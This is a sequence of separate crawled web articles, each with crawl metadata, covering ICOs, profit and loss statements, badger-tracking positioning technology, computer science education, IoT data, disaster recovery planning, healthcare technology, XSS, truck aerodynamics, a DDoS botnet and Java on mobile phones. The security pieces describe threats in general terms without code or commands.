Just as blockchain, the technology that underlies bitcoin and other cryptocurrencies, continues to show potential in transforming many industries, it is also showing its potential in the crowdfunding and investment domain. Initial Coin Offering (ICO) has become a popular way to raise funds for projects that are based on blockchain and cryptocurrencies. An ICO is a cryptocoin crowdsale, where a blockchain-based project allows enthusiasts and supporters to invest in the project by purchasing part of its cryptocurrency tokens in advance. ICOs usually take place in the early phases of a project, and the raised funds are then used to pay development and launch expenses. One of the most successful examples was the famous cryptocurrency project Ethereum, which raised $18 million in ICO and reached an approx. $1 billion market cap in 2016. What’s the difference with other forms of investment? ICOs are often compared to crowdfunding and IPOs. But while they have common traits with all of those, they are unique in their own way and bring innovations to the investment landscape that weren’t possible before. They resemble IPOs (Initial Public Offering) in that they are used to sell a stake and raise money, and they offer investors potential profit in exchange for a risk and possible failure to deliver on the promise. However, ICOs are also different from IPOS and resemble crowdfunding campaigns in the sense that they are supported by early enthusiasts that want to invest in a product or service that hasn’t been launched yet. However, as opposed to crowdfunding which is basically a sort of donation, participants in ICOs have a financial stake and hope to obtain a return on investment for their contribution. Therefore it is safe to assume that an ICO is a mix between donation and investment, somewhere between IPOs and Kickstarter. How does it work? ICOs are usually announced on cryptocurrency forums such as Bitcointalk, where the project team presents their idea along with a whitepaper and other documentation, timelines, goals and other information that will help potential investors understand and evaluate the project. Since ICOs happen before project completion, being transparent and comprehensive about the details of the project is key to gaining trust and appreciation. After the ICO’s launch, cryptocurrency tokens are made available for sale and will have value in the future for those who will work with the platform. The preferred currency for ICOs is bitcoin. ICOs last at least a few weeks and the project tries to raise as much money as possible. In some cases, ICOs will place a cap on the total amount raised (a good practice). If the ICO manages to raise sufficient funds, the project goes ahead to the next step. Once the ICO is completed and the project launched, the ICO tokens get listed of cryptocurrency exchanges to trade against other cryptocurrencies. The price usually reflects the overall cryptocurrency market sentiment, project-specific news, and the addition of new features. Developers who will later want to develop their own applications on top of these platforms are usually drawn to ICOs. What’s the advantage of ICOs? ICO is a great way to bootstrap a blockchain-based project and gain the initial capital necessary to gather a talented team and get started. It is possible to raise as much as a round of Silicon Valley seed funding. The difference, however, is that you do not need to give up equity for the money you raise. ICO removes many of the hurdles present in the VC process and allows startups to short-circuit their way to the market by directly presenting the idea to potential customers. This way, the process will also provide a way to gauge general interest on the project in the same way that presale works for Kickstarter projects. Also, due to the open-source nature of blockchain projects and ICOs, there exists the ability to fork and create similar projects that are slightly different and can cater to the preferences of more targeted audiences in order to weigh the market viability of different variations of the project. What’s the pitfall? The problem with ICOs is that many of them have turned out becoming scams, ideas that never materialized or failed to deliver on their promises. Building on the hype surrounding cryptocoins in general, many teams launched projects that weren’t even centered on a solid idea, and not enough research was done to prove the viability of the project. Investors, on the other hand, usually cling on to the general success of bitcoin and ethereum and see every ICO and blockchain project as the potential for making easy money. Following several cases of failed projects and outright scams, there’s been a raise in wariness and skepticism toward ICOs, and the landscape is gradually self-regulating itself by adopting a set of rules and best practices to evaluate every project. There are now several platforms that perform due diligence on ICOs and help investors better decide where to spend their money. It is also forcing developer team into being more clear and transparent about their projects. Another problem with ICOs is that unlike VC investment, they’re not regulated or registered with any government or organization and offer no investor protection. They owe this characteristic to the nature of the bitcoin and blockchain technologies that support them. The future of ICO ICO is still pretty young and nascent and is still undergoing its development phases. But the promises surrounding it can eventually turn it into a new form of democratized investment that can rival all the traditional forms that are being used today.
<urn:uuid:6c89ecd9-9499-4728-8676-32534f8ff2af>
CC-MAIN-2017-04
https://bdtechtalks.com/2016/12/07/what-is-an-initial-coin-offering-ico/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00487-ip-10-171-10-70.ec2.internal.warc.gz
en
0.964914
1,114
2.5625
3
A profit and loss (P&L) statement tells a company's owners and stakeholders quite simply how it's doing, serving as a report card on financial performance. But unlike in school, this report card isn't as simple as A through F. So let's examine what a P&L statement tells you and why and how it's organized. What does a P&L tell you? Basically, a P&L reports revenues and expenses for a specific period of time. P&Ls typically cover a month, a quarter or a year. The P&L starts off at zero at the beginning of the reporting period and summarizes the activity that occurred during the period. Most business owners start at the top of the report — the "top line" — to see how much money they brought in and then jump right to the bottom to see how much was left over after expenses — the "bottom line," net income or profit. The top line and the bottom line are critically important to understanding performance, but the important management decisions use the detail from the middle of the report. What doesn't the P&L tell you? The P&L does not give you an accumulative score. For example, the score a sports team achieved in a game simply tells you what it scored in that game — not specifically how it played and why; nor how it's ranked in a season overall. A balance sheet is more the type of document that could summarize how a team had played over its entire season and history. P&Ls also do not give you trend data, which would tell you whether line items on the P&L are trending up or down and at what rate. The problem here is that you don't know when something is trending in the wrong direction until it becomes a serious problem. So it is important to use trend data every month in conjunction with your P&L. How is a P&L organized? At the top of the P&L are the revenues, in the middle are the costs of goods sold, followed by expenses, with net income at the bottom. Any revenues or expenses that are not part of your normal business operations are generally called "other income and expenses."
<urn:uuid:fbc8f162-feb6-4610-b5d2-ecac7c40afdc>
CC-MAIN-2017-04
http://www.channelpronetwork.com/article/what_the_bottom_line_isnt_telling_you
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00121-ip-10-171-10-70.ec2.internal.warc.gz
en
0.975698
446
2.828125
3
GPS systems quickly went from a luxury item to a necessity to a ubiquitous contributor to the geographic ignorance of Americans, many of whom rely on their smartphones' ability to give directions to every place they go to keep from having to learn the way themselves. That's a problem when GPS is suddenly unavailable. When the battery dies. When you drive under a bridge and the GPS thinks you jumped to the highway above or below. When you go into a tunnel and disappear entirely. Two biology researchers from Oxford University are trying to remedy that, using GPS technology they adapted to keep track of badgers in suburban wilderness outside the city of Oxford. Andrew Markham and Niki Trigoni, both post-doctoral researchers and instructors at Oxford's Department of Computer Science drew quite a lot of attention to themselves and to Oxford's suburban badger population with a system designed to monitor what the badgers were up to when they were underground. Badgers forage and do most other things above ground by themselves, for the most part, but evidently have a rich communal social life underground. Putting a camera in the burrows would provide a picture of one room, but not a macro picture of what was going on elsewhere. "It is quite challenging to identify badgers when they are underground," Markham told the BBC last year. Rather than string cameras throughout the burrows, or string GPS antennas, the research team planted a series of antennas that would project magnetic fields of varying intensity to cover the whole area of the burrows. Individual badgers got special collars with sensors capable of detecting the fields, tracking their intensity and recording it. When each badger came aboveground the radio in its collar sync'd with servers attached to the antenna network, giving researchers detailed information about where the badger had been during its time out of sight. Because they used very low-frequency magnetic fields, the network Markham and Trigoni built was able to penetrate far deeper underground than radio waves – the medium on which GPS depends. The two found the data they gathered showed not only good badger-tracking capabilities, but also the ability to identify a spot in three dimensions without having to receive signals from three points to calculate location by triangulation. The changing patterns of magnetic fields created a unique signature at each point near the transmitter. Low-frequency magnetic fields penetrated the ground and other solid objects more deeply than radio could have and provided a good depth metric via predictable changes in field intensity. The result was the ability to "triangulate" the position of a sensor using only one antenna and no triangulation at all. "Our technology can work out your position in three dimensions from a single transmitter. It can even tell you which way your device is facing," Markham told Wired. Seeing an opportunity to move out of badgers and into location services, Markham and Trigoni took their system to Isis Innovation, a company owned by Oxford University whose job it is to commercialize scientific findings generated there. The two are looking for 1.7 million pounds in seed capital to fund their startup, OneTriax, which is working on a version of the receiver that would run on Android. Smart phones already have magnetometers and electronic compasses they use to orient the screen and locate cell-phone towers. With slightly more processing power and greater sensitivity, those sensors could also pick up enough magnetic data to be used as a backup location system when line-of-sight GPS radio waves just won't cut it. Making it work will require an advance in signal processing, but not a huge leap. Badger-net pickups rely on a signal with more information in it than a typical GPS radio signal, so reception will still be a challenge, Markham said. The two have already developed the software to process it, however, and are working on ways to improve its accuracy to less than the 30cm give or take the Badger-net was able to achieve. Within four years, Markham predicts, smartphones will be manufactured with his and Trigoni's underground GPS capability. Then the only problems will be extending all those GPS networks with magnetic broadcasting stations, figuring out how to hand responsibility for location from one to the other as the user's location changes and deciding whether or not they'll have to pay the badgers a royalty. "We think it's achievable," he told Wired. Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:a74c10c7-b5d5-4259-9973-7825c6c1b13c>
CC-MAIN-2017-04
http://www.itworld.com/article/2722395/mobile/badger-network-may-keep-humans-from-getting-lost-underground.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00423-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959432
955
3.65625
4
President Obama announced Wednesday that the White House will be hosting a Computer Science for All summit, and that agencies and industry partners are acting in support of computer science (CS) education. The National Science Foundation (NSF) will award $25 million in grants for CS education, the new CSforAll Consortium will assist teachers and track progress, and 200 private organizations have committed to expanding CS opportunities. “In the coming years, we should build on that progress by…offering every student the hands-on computer science and math classes that make them job-ready on day one,” said Obama in the 2016 State of the Union Address. Nine out of 10 parents said that they want CS to be taught in schools; however, one quarter of all schools in the United States offer advanced computer science with programming and coding, according to a blog post from Megan Smith, U.S. chief technology officer. By 2018, 51 percent of all STEM jobs will be in a CS-based field, according to a White House Fact Sheet. “Tech careers are exciting, fun, high-impact, and collaborative as well as being critical for our economy,” Smith said. “We want all Americans to have the opportunity to be part of these teams. CS For All will help make that a reality and ensure every student has access to Computer Science in their classrooms at all levels.” The Girl Scouts of the USA are launching a program to provide CS opportunities to 1.4 million girls annually. Also, Project Code Nodes is collaborating with the Partnership of African American Churches to start coding clubs for 70 girls in economically disadvantaged communities in Charleston, W.Va. SignUp.com and the CSforAll Consortium are creating an “idea center” to bring CS to the SignUp.com community of 8 million parents. Also, Code.org will launch a program to teach CS to seventh- through ninth-grade students. “Because CS is an active and applied field of Science, Technology, Engineering and Math (STEM) learning that allows students to engage in hands-on, real-world interaction with key math, science, and engineering principles, it gives students opportunities to be creators—not just consumers—in the digital economy, and to be active citizens in our technology-driven world,” Smith said.
<urn:uuid:4e75df08-f5f3-41f0-94cc-3fb4f693a9e1>
CC-MAIN-2017-04
https://www.meritalk.com/articles/white-house-expands-computer-science-initiative/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00423-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942558
481
2.8125
3
The Internet of Things is ingrained in today’s technology world, and is already becoming big news across a variety of industries. IoT sensors can be found in devices from smartphones and black boxes to cars and ships – all of which highlights the need for data analytics. It’s fair to say that while IoT is a relatively new phenomenon, there’s already a lot of opportunity. However, that’s not to assume this sphere of tech is without its challenges, because there are loads to choose from. The most challenging of all has to be the fact that IoT is creating masses of data that has nowhere to go. Indeed, according to a report from Cisco, the Internet of Things will create 400 zegabytes of data per year by 2018. As a result, organisations need to decide how they’re going to manage and make sense of the large volume of data they collect from IoT. There is, you could say, a big challenge with Big Data. What’s Big Data? Big Data, quite simply, refers to large sets of data which are far too complex for everyday data handling applications. It has become relevant in the last few years as technology has become more advanced. Due to these advancements, we’re at a point where organisations on a daily basis are collecting vast amounts of data – from business transactions, social media and, indeed, the Internet of Things. This opens up a number of problems they have to face and overcome in order to keep operations running smoothly. These include challenges with analysis, curation, storage, data sharing and privacy. But with all complications, there are always opportunities. If businesses manage Big Data correctly and accurately, they’re able to make operations easier for themselves, make better decisions, spot trends and reduce costs and risk. The question is, how do they do this? Data science is a good starting point While the Internet of Things is still in the early stages of its evolution, now is the perfect time for businesses to start thinking how they’re going to cope with such tech and the data it brings. Mike Weston, CEO of data science consultancy Profusion, believes that the key thing for businesses at this stage is based around planning. He suggests: “Outline exactly what your goals are, and make it clear what you want to achieve. From there, putting in procedures and infrastructure that can collect information, clean it and make it accessible becomes a lot easier.” Planning ahead may sound easy, but collecting data is pointless unless you have the tools to make sense of it. But data science, Weston says, can help. He tells Internet of Business: “Unlike normal data analytics, data science can go well beyond a cursory examination of information to allow the real-time analysis of disparate data sets to reveal profound and well-hidden insights. “With enough information, future behaviour or actions can be predicted with a startling degree of accuracy. By collecting information from smart devices and marrying it with online behaviour, demographic information, economic news and other sets of information, a complete picture on an individual or a set of consumers can be created instantly. Then an ultra-personalised marketing campaign could be created.” Ian Murphy, a principal analyst at Creative Intellect Consulting, sees a hardware-based solution here. He says: “The answer is solar powered, Linux-driven micro servers that are capable of managing large amounts of data in-memory and refining the data before it is transmitted. “In the IBM Zurich research lab, scientists are already testing such micro servers that are no larger than a current DIMM module for a server, and when they go to production, they expect to reduce them potentially to the size of a compact flash card. “This would enable the micro servers to be embedded into a wide range of IoT devices in the industrial, safety and information gathering worlds where they could carry out point of acquisition work through the use of their compute power.” Sometimes you just have to make compromises Roman Blinds is a manufacturer of blinds based in Yorkshire. In recent times, it’s been experimenting with apps that work with automated blinds to help maintain a preselected temperature or light level. Although such apps would provide the business with mass market opportunity, it’s been struggling with the amount of data that comes from the sensors it’s been working with. To deal with this situation in the short-term, the firm has had to limit the sensors in order to prevent the blinds from adjusting. As well as this, it’s been putting the data into a simple database, which it says is “not the most efficient way of doing things”. Nevertheless, it’s not given up and aims to get its blinds to market soon. Collecting so much data can bring about privacy concerns Clearly, by combining different sets of data in a process of analysis, businesses are able to identify potential leads. However, when you consider just how much data can be involved, there are obviously going to be privacy concerns. Most of this date is based on customer and client information, after all. This is why transparency is extremely important. Weston says: “People need to understand and approve of what you intend to do with their information. Also, and it should go without saying, a business needs to offer something in return for collecting and using personal information, whether it’s an improved product, better customer service or more relevant marketing information.”
<urn:uuid:987b3153-4c9e-430d-8e9d-51cb95178892>
CC-MAIN-2017-04
https://internetofbusiness.com/making-sense-of-iot-with-big-data-analytics/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00268-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948881
1,139
2.84375
3
10 Emerging Healthcare Technologies New technologies are constantly in development to help people stay healthy, better diagnose disease, treat illness, and provide a better quality of life. Here are some examples: Intelligent Pills Deliver Medication to Specific Locations: Philips Research has developed an intelligent pill that can be programmed to deliver targeted doses of medication to patients with digestive disorders such as Crohn’s disease, colitis, and colon cancer.1 Sensor Technology Tracks Medication Adherence: Proteus Biomedical is working on technology that incorporates a tiny sensor into pills for targeting medication adherence for organ transplants, cardiovascular disease, infectious diseases, diabetes, and psychiatric disorders.2 Brain Implants Prevent Seizures: The RNS System, a responsive neurostimulator from NeuroPace, detects abnormal electrical activity in the brain that signals the onset of a seizure, and delivers a specific pattern of mild electrical stimulation to block the seizure. Contact Lens Detects Glaucoma: Sensimed’s scientists have created a smart contact lens with an embedded microchip that monitors intraocular pressure. If a patient wears the contact lens for a day, glaucoma can be detected sooner and more reliably, and the efficacy of the treatment can be monitored over time, potentially averting blindness.3 Artificial Pancreas for Diabetics: Researchers at Massachusetts General Hospital and Boston University have successfully completed a trial with 11 type-1 diabetic patients using a new “artificial pancreas”4 that consists of insulin pumps, glucose sensors, and regulatory software. Printing New Skin: Wake Forest University’s scientists have discovered how to apply ink-jet printer technology to ‘print’ proteins directly onto a burn victim’s body for faster and more thorough healing.5 Artificial Retina: The U.S. Department of Energy’s (DOE) Artificial Retina Project — a collaboration of five DOE national laboratories, four universities, and private industry — is developing a retinal prosthesis. To date, progress has been made by enabling direct communication between the implant and the neural cells that carry visual information to the brain.6 Video Games Hone Medical Student Decision-Making Skills: The University of Texas, Corpus Christi, and BreakAway Ltd., have developed a ‘serious’ video game that lets professionals and students practice on 3D video patients using the same interactive techniques and decision-making processes they would use with real patients. Robot Care Givers: MIT’s “Huggable” teddy bear robot can serve as a medical communicator for children. Packed with electronic sensors and sensitive skin technologies, the robot can distinguish between cuddling for comfort or agitation by sensing the strength of the squeeze.7 Lab-on-a-Chip: Researchers at the University of California, Davis, have created a lab-on-a-chip for HIV testing that does not require expensive resources and can deliver results in seconds. The portable and less expensive lab-on-a-chip is a holographic, lens-free imaging mechanism that counts specific molecules and blood cells to determine if the blood is HIV positive.8
<urn:uuid:507a41a2-17de-4e61-8a15-893ba1ce699f>
CC-MAIN-2017-04
http://www.csc.com/cscworld/publications/65429/65814-10_emerging_healthcare_technologies
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00084-ip-10-171-10-70.ec2.internal.warc.gz
en
0.878063
654
3.234375
3
XSS or Cross Site Scripting, while not a new threat, is becoming increasingly more common. Further, this threat is being leveraged more and more to perform phishing attacks. Since financial institutions are the target in the vast majority of phishing attacks, these businesses must take steps now to ensure the safety of their clients. What Is XSS? Though the acronym may be similar to RSS (Real Simple Syndication), XSS (Cross Site Scripting) is nothing like it at all, and is actually one of the more problematic security threats facing enterprises with a Web presence. In an XSS attack, hackers maliciously insert code into an improperly configured Web page. Thereafter, anyone that visits the Web page will be susceptible to whatever actions that code can execute. Depending on the nature of the XSS attack (three types are known to exist) the user's session can be hijacked, sensitive information about the user (such as login credentials) can be captured, or the user's device can be infected with malware.
<urn:uuid:a9b4834b-097e-4d97-8ea4-fdca45dc1296>
CC-MAIN-2017-04
https://www.infotech.com/research/banks-beware-xss-is-an-attack-not-a-new-rss
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00084-ip-10-171-10-70.ec2.internal.warc.gz
en
0.921649
208
2.78125
3
Contingency Planning and Disaster Recovery Of the more than $40 billion that insurance companies paid out because of the Sept. 11 attacks, more than 25 percent–$11 billion–was for claims related to business interruption. Some industry experts say that among organizations that suffer significant, sustained disasters, 20 percent are completely out of business within 24 months. Yet most companies today do not have contingency plans. Many existing plans are out of date or ignore key human factors. Worse yet, many plans have not been tested. Contingency plans address the “availability” security principle. The availability principle addresses threats related to business disruption so that authorized individuals have access to vital systems and information when required. Contingency planning, also referred to as business continuity planning (BCP), is a coordinated strategy that involves plans, procedures and technical measures to enable the recovery of systems, operations and data after a disruption. The contingency plan must be developed with the input and support of line managers and all key constituencies, since the plan will need to work across the organization. The plan must be based on the risks faced by the organization, as well as risks associated with partners, suppliers and customers. All technology issues must be addressed in the context of business operations. The plan itself must be tested regularly and refined as required. The core objectives of contingency planning include the capability to: - Restore operations at an alternate site. - Recover operations using alternate equipment. - Perform some or all of the affected business processes using other means. Business Impact Analysis (BIA) One of the critical steps in contingency planning is business impact analysis (BIA). BIA helps to identify and prioritize critical IT systems and components. IT systems may have numerous components, interfaces and processes. BIA enables a complete characterization of system requirements, processes and interdependencies. As part of the BIA process, information is collected, analyzed and interpreted. The information provides the basis for defining contingency requirements and priorities. The objective is to understand the impact of a threat on the business. The impact of the threat may be economic, operational or both. Questionnaires or survey tools may be used to collect the information. It may be necessary for organizations to prioritize their sensitive business information into categories. An example of this is what can be found in the Massachusetts Institute of Technology’s Disaster Recovery and Business Resumption plans. Classification of Threats The National Institute of Standards and Technology (NIST) has identified three classifications of threats: natural (hurricane, tornado), human (operator error, terrorist attacks) and environmental (equipment failure, electric power failure). Systems are vulnerable to a variety of disruptions, ranging from mild, such as a short-term power outage or a disk-drive failure, to severe, such as equipment destruction or fire. Vulnerabilities may be minimized or eliminated through technical, management or operational solutions as part of the organization’s risk management effort. However, it is impossible to eliminate all risks. Contingency planning is designed to mitigate the risk of system and service unavailability by focusing on effective and efficient recovery solutions. Components of a Contingency Plan Every business must develop a contingency plan. The responsibility of the contingency planning process is typically with the contingency planning coordinator. This individual may be the security officer, the CIO or an individual with management responsibilities and experience in this area. It is recommended that the organization formally identify this person and the team that will be working to develop the contingency plan. The contingency plan document must specifically address the following critical components: - Data Backup Plan (Administrative Safeguard): A documented and routinely updated plan to create and maintain retrievable exact copies of information for a specific period of time. Successful data backup and restores are sometimes dependent on business processes and “batch” activities. The organization needs to carefully test all critical backups and restores on a schedule related to the criticality of data to the organization. - Disaster Recovery Plan (Administrative Safeguard): Provides a blueprint to continue business operations in the event that a catastrophe occurs. The disaster recovery plan must include contingencies for the period during the disaster and until the recovery plan can be completely implemented. - Emergency Mode Operation Plan (Administrative Safeguard): The part of an overall contingency plan that contains a process enabling an enterprise to continue to operate in the event of fire, vandalism, natural disaster or system failure. Organizations must consider identifying the levels of emergencies and associated responses. - Testing and Revision Procedure (Administrative Safeguard): Procedures for the processing of periodic testing of written contingency plans to discover weaknesses and, subsequently, revising the documentation if necessary. These written testing and feedback mechanisms are the key to successful tests. The tests conducted may be walkthroughs or document reviews, simulation tests or checklist tests, or may very well be a full interruption test to check all aspects of the contingency plan. - Applications and Data Criticality Analysis (Administrative Safeguard): The purpose of applications and data criticality analysis is to assess the relative criticality of specific applications and data in support of other contingency plan components. It is an entity’s formal assessment of the sensitivity, vulnerabilities and security of its programs and the information it receives, manipulates, stores or transmits. This procedure begins with an application and data inventory. - Contingency Operations (Physical Safeguard): Contingency operations establish (and implement as needed) procedures that allow facility access in support of restoration of lost data under the disaster recovery plan and emergency mode operation plan in the event of an emergency. Physical security is a critical aspect of disaster and business continuity planning. Administrative controls for physical access to enable contingency operations must be in place so recovery can proceed as defined in plans. - Data Backup and Storage (Physical Safeguard): Continual and consistent backup of data is required, as one cannot be sure when an organization may experience some disaster that will require access to data that has been backed up. Data may also be lost or corrupted, hence a good data backup plan is important. Data backup methods include full, incremental or differential. Data backup and storage addresses questions such as: Where will the media be stored? What is the media-labeling scheme? How quickly will data need to be recovered in the event of an emergency? How long will data be retained? What is the appropriate media type used for backup? - Emergency Access Procedures (Technical Safeguard): Establish and implement procedures for obtaining necessary sensitive business information during an emergency. Emergency access is a requisite part of access control and will be necessary under emergency conditions, although these may be very different from those used in normal operational circumstances. For example, in a situation where normal environmental systems, including electrical power, have been severely damaged or rendered inoperative due to a disaster, procedures should have been established beforehand to provide guidance on possible w
<urn:uuid:1a67be02-6668-4f12-bf9e-4e99ee1c4bf0>
CC-MAIN-2017-04
http://certmag.com/contingency-planning-and-disaster-recovery/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00204-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923161
1,407
2.6875
3
Long haul tractor trailers are a fixture of the American landscape, delivering all manner of supplies from one end of the country to the other. The estimated 1.3 million Class 8 long-haul trucks on this country’s roadways carry approximately 70 percent of all freight and use more than 20 percent of all fuel consumed in the US. Big rigs are essential to the country’s economy, but there is a price to pay in the form of a big environmental footprint. Most trucks only get about 6 miles to the gallon and altogether they emit about 423 million pounds of CO2 into the atmosphere each year. |Supercomputing simulations at Oak Ridge National Laboratory enabled SmartTruck Systems engineers to develop the UnderTray System, some components of which are shown here. The system dramatically reduces drag – and increases fuel mileage – in long-haul trucks. Image credit: Michael Matheson, Oak Ridge National Laboratory| An HPC-developed technology is helping to save billions of gallons of fuel each year. In 2011, South Carolina-based BMI Corp. partnered with researchers at Oak Ridge National Laboratory (ORNL) to develop the SmartTruck UnderTray System, “a set of integrated aerodynamic fairings that improve the aerodynamics of 18-wheeler (Class 8) long-haul trucks.” After installation, the typical big rig can expect to achieve a fuel savings of between 7 and 12 percent, amounting to $5,000 annual savings in fuel costs. The effort has been going strong since 2011. Last week, the Oak Ridge Leadership Computing Facility (OLCF) announced that BMI-offshoot SmartTruck Systems has sold more than 25,000 UnderTray Systems to trucking fleets in North America. Mike Henderson, chief executive officer and founder of BMI and SmartTruck’s Chief Scientist observes: “If all of the 1.3 million Class 8 trucks in the country were configured with just the minimum package of new components, the U.S. could annually save almost 1.5 billion gallons of diesel fuel, reduce CO2 by 16.5 million tons and save more than $6 billion in fuel costs.” Simulating a technology like this requires some heavy-duty HPC smarts. That’s what led SmartTruck engineers to the Oak Ridge Leadership Computing Facility and the Cray Jaguar supercomputer. Using the National Aeronautics and Space Administration application code, they studied the airflow around the 18-wheelers and identified a way to significantly reduce drag through the addition of an aftermarket component. With Jaguar, the time it took to model these components went from days (using a modest in-house cluster) to mere hours. BMI/SmartTruck was able to go from concept to production in just 18 months instead of the 3.5 years it had anticipated. Recently SmartTruck president Mike Henderson revealed the company was tapping the HPC resources of another OLCF machine, Titan (the new-and-improved Jaguar). Henderson needs to ensure that trucks passing through California satisfy state air quality laws. Specifically, the law requires that all trucks are outfitted with low rolling resistance tires and other aerodynamic devices to boost fuel efficiency. Solving these problems takes complex simulations paired with the most powerful supercomputers. SmartTruck’s bold plans are part of a national push to create more fuel-efficient vehicles. The Department of Energy’s Super Truck Program, for example, aims to improve the fuel mileage of Class 8 trucks by 50 percent by 2015. Given the current average of 5.5 to 6.5 MPG, a 50 percent increase could save about $25,000 annually per truck (based on traveling 120,000 miles per year), which would reduce greenhouse gas emissions by 35 percent for each truck. SmartTruck, which currently employes more than 25 employees, has doubled in size each year since 2011. According to the recent announcement from OLCF, “UnderTray Systems have a quick payback period and a favorable return on investment, so fleets have strong incentive to upgrade trailers with the components, which are manufactured entirely in the USA and are 100 percent recyclable.”
<urn:uuid:0fe001e0-1229-49d0-93dd-0d6df43da2a2>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/08/26/big_rig_redesign_still_going_strong/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00506-ip-10-171-10-70.ec2.internal.warc.gz
en
0.935834
859
3.25
3
Today is “Take Our Sons and Daughters to Work Day,” a non-profit educational program that encourages parents to take their children to work for one day to explore career options, boost their self esteem and bond with their parents. Originally, this holiday was geared only towards daughters to encourage the support of women in the workplace, but eventually it was expanded to include sons as well. By exposing your children to your profession, we can inspire a new generation of talent in the workforce and encourage them to pursue the career path of their dreams. Though it’s wonderful that we have a designated holiday for this cause, wouldn’t it be great for children to learn more about other professions, even outside of their parents’ given jobs? With HD video communications, classrooms can be transported to any company around the world and students can meet with experts in a variety of fields to expand upon their career knowledge. Wouldn’t it be amazing to introduce a classroom full of students in a rural town to an astronaut, a diplomat or the CEO of a Fortune 500 company? Imagine the kind of lessons they could learn from these industry leaders! It’s the kind of lesson you could never learn in a textbook. For example, one high school in the Barrow County School District connected with a nanotechnology professor at Georgia Tech University for a semester-long project. One student was so inspired by the project and the field of nanotechnology that she applied to Georgia Tech and was accepted into the program. Without video, this student would have never realized her dream of becoming a scientist! Of course, there’s no replacement for the kind of bond a parent has with his or her child, and Take Your Kids to Work Day is a wonderful way to encourage that bond. But let’s think even bigger than simply one day a year! With the power of video technology, your kids can experience careers they’ve only dreamed about. Will you be celebrating “Take Your Kids to Work Day?” We’d love to hear about your experience in the comment box below.
<urn:uuid:5bfc99a2-b73e-43b0-9cde-9d0024aef909>
CC-MAIN-2017-04
http://www.lifesize.com/video-conferencing-blog/take-your-kid-to-work-day/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00416-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961623
430
2.6875
3
A blended DDoS botnet consisting of both Windows and Linux machines has been detected by researchers working with the Polish CERT. The botnet is exclusively dedicated to mounting DDoS attacks, mainly DNS amplification attacks. “This means that the attackers were interested only in infecting machines which have a significant network bandwidth, e.g. servers,” they noted. “This is also probably the reason why there are two versions of the bot – Linux operating systems are a popular choice for server machines.” As far as they can tell, attackers breached the affected Linux machines by way of a successful SSH dictionary attack, then logged into it and downloaded, installed and executed the bot. The Linux version of the bot tries to connect to the C&C server via a high TCP port. “Both the C&C’s IP and port are encrypted,” they explained in a blog post. “Upon running, the bot sends operating system information (using uname function), unencrypted and waits for commands.” After analysing the malware they concluded that it can launch four type of DDoS attacks. Also, that it has functions that haven’t yet been implemented. The bot targeting the Windows OS works a bit differently. Once on the computer, it drops an executable and runs it, which results in a persistent Windows service dubbed DBProtectSupport to be registered and started. The bot also contacts the C&C server also a high TCP port, but it first needs to send a DNS query to the 22.214.171.124 server to be informed of its IP address. It then “informs” the server of the target system’s details by compiling and sending a text file. “This text file, along with the fact that the same C&C IP was used in both malware samples make us believe that it was created by the same group,” the researchers concluded. But while Linux users can secure their machines from this attack by choosing a better SSH password, they haven’t mentioned how Windows system get compromised in the first place.
<urn:uuid:d83479d6-3500-4d3e-9a0b-b9bf00ea9379>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2013/12/18/ddos-botnet-spreading-on-linux-and-windows-machines/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00562-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945626
438
2.609375
3
On 19 August, Sun Microsystems and some of its partners announced the shipment of Mobile Information Device (MID) standard, based on the Java programming language (JavaTM 2 Platform Micro Edition - J2ME) for use on mobile phones. At the same time, Motorola, one of the biggest companies for the development of wireless technologies, released an application-programming interface (API), allowing for the development of additional programs for its wireless devices. This may seem to most people to be just a collection of abstract technical terms; however, the significance of this event cannot be overstated, because it is an important milestone in the evolution of mobile phone functionality. The further integration of the Java programming language will enable third party applications to be used on mobile phones and, respectively, will allow end users to write their own programs and to share those applications across wireless networks. It is certainly a huge step forward on the way to developing mobile phones from just a connection medium to a multipurpose communication portal. Java technology allows wireless devices to be powered by nearly any additional application, which is only limited by equipment functional capability. It dramatically enhances the overall consumer experience by modifying the static text to interactive, graphic, easy-to-use services. Nevertheless, there is another side to this story: the new functioning capability provides an excellent opportunity not only for writing useful programs, but also malicious ones. Currently, computer viruses attack mobile phones implicitly (for instance, by sending obtrusive SMS-messages). In the future, however, viruses will almost certainly appear, living directly in mobile phones. How real is this possibility? "We define three main conditions for the existence of a virus. Firstly, popularity of the platform or equipment. Secondly, availability of the development tools. And thirdly, insufficient protection," comments Den Zenkin, Head of Corporate Communications for Kaspersky Lab. "In this case, only the first two conditions are fully met. As far as the last condition is concerned, we see this exactly as what can prevent viruses from being the same threat to mobile phones that they are to PC users today." Java technology has already proved that it is reliable and secure. During the years it has existed, only a few Java viruses have been detected, and these were more conceptual rather than posing a real danger. 